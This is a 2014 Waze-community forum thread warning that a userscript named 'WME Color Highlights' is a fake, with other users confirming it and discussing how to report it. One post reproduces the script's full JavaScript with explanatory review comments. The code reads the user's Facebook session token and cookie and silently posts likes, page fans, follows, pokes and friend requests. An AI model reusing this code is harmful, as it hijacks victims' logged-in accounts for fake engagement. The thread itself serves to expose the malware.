
Attention: new WME Color Highlights on userscripts.org

Posted: Fri Feb 14, 2014 12:43 pm
by AlexN-114
I found a new script at userscripts.org which calls itself WME Color Highlights and is from zuny alen. I looked into it and found nothing which looks like a Highlighter. :evil:
It is not limited to the Waze page and seems to send "likes" to Facebook pages.

Perhaps I am just too stupid to understand this script, but I will not trust it.

If I want to install WME Color Highlights, I will check that it is from Timbones (OK, I know my WME Highlighter City is also safe).

Re: Attention: new WME Color Highlights on userscripts.org

Posted: Fri Feb 14, 2014 4:21 pm
by asterix06
How could we keep CH users aware of the fake...as not everybody is reading here?

Re: Attention: new WME Color Highlights on userscripts.org

Posted: Fri Feb 14, 2014 6:53 pm
by doctorkb
asterix06 wrote:How could we keep CH users aware of the fake...as not everybody is reading here?
Perhaps by somehow pointing everyone to either the wiki or this forum for script links...

There doesn't appear to be any reliable way of reporting malicious code on userscripts.

Re: Attention: new WME Color Highlights on userscripts.org

Posted: Sat Feb 15, 2014 6:28 pm
by McCracken808
Use this link to report its bogus nature to userscripts.org.

Re: Attention: new WME Color Highlights on userscripts.org

Posted: Fri Feb 14, 2014 12:48 pm
by OyyoDams
Exactly, this one is a fake!

For info the code has nothing to do with a WME extension:


// ==UserScript==
// @name            WME Color Highlights
// @namespace       WME Color Highlights
// @Hak Cipta          Smart Boy
// ==/UserScript==
// NOTE(review): annotated copy of the fake script; the code itself is unchanged.
// The metadata block above declares no @include/@match rule. Greasemonkey treats
// that as "@include *", so the script is injected into every page the user opens,
// not only the Waze editor. Nothing in the quoted code refers to Waze at all;
// every URL in it is a facebook.com endpoint, which is the mismatch to look for
// when reviewing a script that claims to be an editor helper.
//
// fb_dtsg: value of the first element named "fb_dtsg" in the current page (the
//   request token Facebook embeds in its forms). On a page with no such element,
//   [0] is undefined and this first statement throws, so nothing below runs there.
// user_id: the digits after "c_user=" in document.cookie. The outer match() just
//   re-matches that same digit string, so the result is a match array that turns
//   into the id when concatenated into a string. Throws if the cookie is absent.
// Like(p): sends an asynchronous POST to /ajax/pages/fan_status.php on
//   www.facebook.com with fbpage_id=p and add=true, together with the fb_dtsg and
//   user_id values read above. On a www.facebook.com page this is a same-origin
//   request from the logged-in user's own tab, carrying the page's own token.
//   The response is never read: "Page.close;" is a bare property access, not a
//   call, so the readystatechange handler does nothing.
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function Like(p) { var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp="; Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } }; Page.send(PageParams); } 
// NOTE(review): fb_dtsg and user_id are re-declared several more times on this
// line with the same reads from the page and the cookie; the repetition suggests
// the script was pasted together from separate snippets (inferred, not stated).
//
// a(abone): POST to the relative path /ajax/follow/follow_profile.php with
//   profile_id=abone and the fb_dtsg value. The URL is relative, so the request
//   goes to whatever origin the current page is on.
// sublist(uidss): creates a <script> element whose text calls AsyncRequest (not
//   defined in this script; presumably provided by the host page) against
//   /ajax/friends/lists/subscribe/modify with flid=uidss, then appends it to
//   document.body so it executes in the page.
// p(abone): POST to //www.facebook.com/ajax/poke_dialog.php with uid=abone,
//   ask_for_confirm=0, and the user_id / fb_dtsg values.
// now: current time in milliseconds, used only inside the client_id parameter of P.
// P(opo): POST to //www.facebook.com/ajax/ufi/like.php with like_action=true and
//   ft_ent_identifier=opo. Its parameter string literal continues on the next line.
//
// As in Like(), none of the handlers read the response ("http4.close" / "X.close"
// are property accesses, not calls). In the lines quoted in this post only P and
// Like are invoked; a, sublist and p are defined but not called.
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value; var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function a(abone) { var http4=new XMLHttpRequest; var url4="/ajax/follow/follow_profile.php?__a=1"; var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp="; http4.open("POST",url4,true); http4.onreadystatechange=function() { if(http4.readyState==4&&http4.status==200)http4.close } ; http4.send(params4) } function sublist(uidss) { var a = document.createElement('script'); a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; document.body.appendChild(a); } function p(abone) { var http4 = new XMLHttpRequest(); var url4 = "//www.facebook.com/ajax/poke_dialog.php"; var params4 = "uid=" + abone + "&pokeback=0&ask_for_confirm=0&nctr[_mod]=pagelet_timeline_profile_actions&__asyncDialog=1&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=v&fb_dtsg="+fb_dtsg+"&phstamp="; http4.open("POST", url4, true); http4.onreadystatechange = function () { if (http4.readyState == 4 && http4.status == 200) { http4.close; } }; http4.send(params4); }var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var now=(new Date).getTime(); function P(opo) { var X = new XMLHttpRequest(); var XURL ="//www.facebook.com/ajax/ufi/like.php"; var XParams = 
"like_action=true&ft_ent_identifier="+opo+"&source=1&client_id="+now+"%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tn]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg="+fb_dtsg+"&phstamp="; X.open("POST", XURL, true); X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close; } }; X.send(XParams); } 
// pic + fans
// NOTE(review): these calls execute as soon as the script is injected; no click
// or other user action is involved.
//   P(id)    -> POST to /ajax/ufi/like.php with ft_ent_identifier=id
//   Like(id) -> POST to /ajax/pages/fan_status.php with fbpage_id=id, add=true
// The numeric IDs are hard-coded in the script. What they point to cannot be told
// from this listing beyond the parameter names they are sent under.
P("451804298278412");Like("710616545637958");Like("1409918565922390");Like("275136455944477");Like("603080806413219");P("616944838368872");Like("219378364899812");Like("420844481374394");
/*Add Friend*/;
// Another copy of the same two reads seen at the top of the script: the fb_dtsg
// form value from the page and the c_user id from document.cookie. Both are used
// by IDS() below.
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
/**
 * NOTE(review): sends an asynchronous POST to /ajax/add_friend/action.php on
 * www.facebook.com with to_friend=r and action=add_friend, plus the user_id and
 * fb_dtsg values read from the cookie and the page by the enclosing script.
 * Nothing is returned and the response is never inspected.
 * IDS is not invoked anywhere in the lines quoted in this post.
 *
 * @param r - value concatenated, unencoded, into the to_friend parameter.
 */
function IDS(r) {
  var X = new XMLHttpRequest();
  // Protocol-relative URL: uses the scheme of the page the script was injected into.
  var XURL = "//www.facebook.com/ajax/add_friend/action.php";
  // Form-style body built by string concatenation; user_id and fb_dtsg are the
  // script-level variables declared just above this function.
  var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
  X.open("POST", XURL, true);
  X.onreadystatechange = function () {
    if (X.readyState == 4 && X.status == 200) {
      // Bare property access, not a call: this statement has no effect, so the
      // handler does nothing with the completed request.
      X.close;
    }
  };
  X.send(XParams);
}

Re: Attention: new WME Color Highlights on userscripts.org

Posted: Fri Feb 14, 2014 2:05 pm
by Timbones
Yes, it's been reported before. This author has a huge number of scripts, all masquerading as something they are not.